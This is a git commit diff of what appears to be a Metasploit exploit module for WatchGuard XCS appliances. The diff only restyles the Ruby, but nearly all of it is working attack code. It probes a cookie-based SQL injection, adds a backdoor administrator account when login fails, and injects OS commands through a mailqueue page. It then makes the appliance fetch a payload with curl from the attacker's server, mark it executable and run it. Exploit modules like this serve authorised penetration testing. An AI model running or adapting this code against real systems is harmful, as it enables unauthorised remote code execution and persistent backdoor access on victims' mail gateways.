Do some code style fixes to watchguard_cmd_exec

jvazquez-r7 · jvazquez-r7 · commit 19b577b30a3f · 2015-09-25T09:51:00.000-05:00
diff --git a/modules/exploits/freebsd/http/watchguard_cmd_exec.rb b/modules/exploits/freebsd/http/watchguard_cmd_exec.rb
@@ -67,10 +67,12 @@ def check
       'uri' => normalize_uri(target_uri.path, '/borderpost/imp/compose.php3'),
       'cookie' => "sid=1'"
      })
+
      if res and res.body =~ /unterminated quoted string/
        return Exploit::CheckCode::Vulnerable
      end
-     return Exploit::CheckCode::Safe
+
+     Exploit::CheckCode::Safe
   end
 
 
@@ -79,64 +81,56 @@ def exploit
     @sid = get_session
 
     #Check if cmd injection works
-    test_cmd_inj = send_cmd_exec("/ADMIN/mailqueue.spl", "id")
-    unless test_cmd_inj and test_cmd_inj.body =~ /uid=65534/
-      fail_with(Failure::UnexpectedReply, "Could not inject command, may not be vulnerable")
+    test_cmd_inj = send_cmd_exec('/ADMIN/mailqueue.spl', 'id')
+    unless test_cmd_inj && test_cmd_inj.body.include?('uid=65534')
+      fail_with(Failure::UnexpectedReply, 'Could not inject command, may not be vulnerable')
     end
 
     #We have cmd exec, stand up an HTTP server and deliver the payload
-    vprint_status("Getting ready to drop binary on appliance")
+    vprint_status('Getting ready to drop binary on appliance')
 
     #Generate payload
     @pl = generate_payload_exe
     @elf_sent = false
-    waited = 0
-    while (not @pl)
-      print_status("Waiting for payload to finish generating...")
-      select(nil,nil,nil,1)
-      waited += 1
-      if (waited > 20)
-        fail_with(Failure::Unknown, "Unable to generate payload within a reasonable time.")
-      end
-    end
 
     #Start the server and use primer to trigger fetching and running of the payload
     begin
-      Timeout.timeout(datastore['HTTPDELAY']) {super}
+      Timeout.timeout(datastore['HTTPDELAY']) { super }
     rescue Timeout::Error
     end
   end
 
-  def attempt_login(username,pwd_clear)
+  def attempt_login(username, pwd_clear)
     #Attempts to login with the provided user credentials
     #Get the login page
     get_login_hash = send_request_cgi({
-    'uri' => normalize_uri(target_uri.path, '/login.spl')
+      'uri' => normalize_uri(target_uri.path, '/login.spl')
     })
 
     unless get_login_hash and get_login_hash.body
-      fail_with(Failure::Unreachable, "Could not get login page.")
+      fail_with(Failure::Unreachable, 'Could not get login page.')
     end
 
     #Find the hash token needed to login
     login_hash = ''
     get_login_hash.body.each_line do |line|
-    next if line !~ /name="hash" value="(.*)"/
+      next if line !~ /name="hash" value="(.*)"/
       login_hash = $1
+      break
     end
 
     sid_cookie = (get_login_hash.get_cookies || '').scan(/sid=(\w+);/).flatten[0] || ''
     if login_hash == '' || sid_cookie == ''
-      fail_with(Failure::UnexpectedReply, "Could not find login hash or cookie")
+      fail_with(Failure::UnexpectedReply, 'Could not find login hash or cookie')
     end
 
     login_post = {
       'u' => "#{username}",
       'pwd' => "#{pwd_clear}",
       'hash' => login_hash,
-      'login' => "Login"
+      'login' => 'Login'
     }
-    print_status("Attempting to login with provided credentials")
+    print_status('Attempting to login with provided credentials')
     login = send_request_cgi({
       'uri' => normalize_uri(target_uri.path, '/login.spl'),
       'method' => 'POST',
@@ -150,11 +144,12 @@ def attempt_login(username,pwd_clear)
 
 
     unless login and login.body =~ /<title>Loading...<\/title>/
-      return false
+      return nil
     end
 
-    print_status("Successfully logged in")
-    return sid_cookie
+    print_status('Successfully logged in')
+
+    sid_cookie
   end
 
   def add_user(user_id, username, pwd_hash, pwd_clear)
@@ -173,23 +168,26 @@ def add_user(user_id, username, pwd_hash, pwd_clear)
     else
       fail_with(Failure::UnexpectedReply, "Unable to add user to database")
     end
-    return true
+
+    true
   end
 
   def generate_device_hash(cleartext_password)
     #Generates the specific hashes needed for the XCS
-    pre_salt = "BorderWare "
-    post_salt = " some other random (9) stuff"
+    pre_salt = 'BorderWare '
+    post_salt = ' some other random (9) stuff'
     hash_tmp = Rex::Text.md5(pre_salt + cleartext_password + post_salt)
     final_hash = Rex::Text.md5(cleartext_password + hash_tmp)
-    return final_hash
+
+    final_hash
   end
 
-  def send_cmd_exec(uri,os_cmd,blocking=false)
+  def send_cmd_exec(uri, os_cmd, blocking = false)
     #This is a handler function that makes HTTP calls to exploit the command injection issue
     unless @sid
-      fail_with(Failure::Unknown, "Missing a session cookie when attempting to execute command.")
+      fail_with(Failure::Unknown, 'Missing a session cookie when attempting to execute command.')
     end
+
     res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path, "#{uri}"),
       'cookie' => "sid=#{@sid}",
@@ -201,11 +199,11 @@ def send_cmd_exec(uri,os_cmd,blocking=false)
     })
 
     #Handle cmd exec failures
-    if (!res and blocking == false)
-      fail_with(Failure::Unknown, "Failed to exploit command injection.")
+    if res.nil? && blocking == false
+      fail_with(Failure::Unknown, 'Failed to exploit command injection.')
     end
 
-    return res
+    res
   end
 
   def get_session
@@ -216,24 +214,26 @@ def get_session
 
     sid_cookie = attempt_login(username, pwd_clear)
     unless sid_cookie
-      vprint_status("Failed to login, attempting to add backdoor user...")
+      vprint_status('Failed to login, attempting to add backdoor user...')
       pwd_hash = generate_device_hash(pwd_clear)
+
       unless add_user(user_id, username, pwd_hash, pwd_clear)
-        fail_with(Failure::Unknown, "Failed to add user account to database.")
+        fail_with(Failure::Unknown, 'Failed to add user account to database.')
       end
 
       sid_cookie = attempt_login(username, pwd_clear)
-      unless (sid_cookie)
-          fail_with(Failure::Unknown, "Unable to login with user account.")
-      end
 
+      unless sid_cookie
+          fail_with(Failure::Unknown, 'Unable to login with user account.')
+      end
     end
-    return sid_cookie
+
+    sid_cookie
   end
 
-  #Make the server download the payload and run it
+  # Make the server download the payload and run it
   def primer
-    vprint_status("Primer hook called, make the server get and run exploit")
+    vprint_status('Primer hook called, make the server get and run exploit')
 
     #Gets the autogenerated uri from the mixin
     payload_uri = get_uri
@@ -243,26 +243,26 @@ def primer
 
     dnld_cmd1 = "/usr/local/sbin/curl -k #{payload_uri} -o /tmp/#{filename}"
     vprint_status("Telling appliance to run #{dnld_cmd1}")
-    send_cmd_exec("/ADMIN/mailqueue.spl",dnld_cmd1)
+    send_cmd_exec('/ADMIN/mailqueue.spl', dnld_cmd1)
     register_file_for_cleanup("/tmp/#{filename}")
 
     chmod_cmd = "chmod +x /tmp/#{filename}"
-    vprint_status("Chmoding the payload...")
-    send_cmd_exec("/ADMIN/mailqueue.spl",chmod_cmd)
+    vprint_status('Chmoding the payload...')
+    send_cmd_exec("/ADMIN/mailqueue.spl", chmod_cmd)
 
     exec_cmd = "/tmp/#{filename}"
-    vprint_status("Running the payload...")
-    send_cmd_exec("/ADMIN/mailqueue.spl",exec_cmd,true)
-
+    vprint_status('Running the payload...')
+    send_cmd_exec('/ADMIN/mailqueue.spl', exec_cmd, true)
 
-    print_status("Finished primer hook")
+    vprint_status('Finished primer hook')
   end
 
   #Handle incoming requests from the server
   def on_request_uri(cli, request)
     vprint_status("on_request_uri called: #{request.inspect}")
-    print_status("Sending the payload to the server...")
+    print_status('Sending the payload to the server...')
     @elf_sent = true
     send_response(cli, @pl)
   end
+
 end
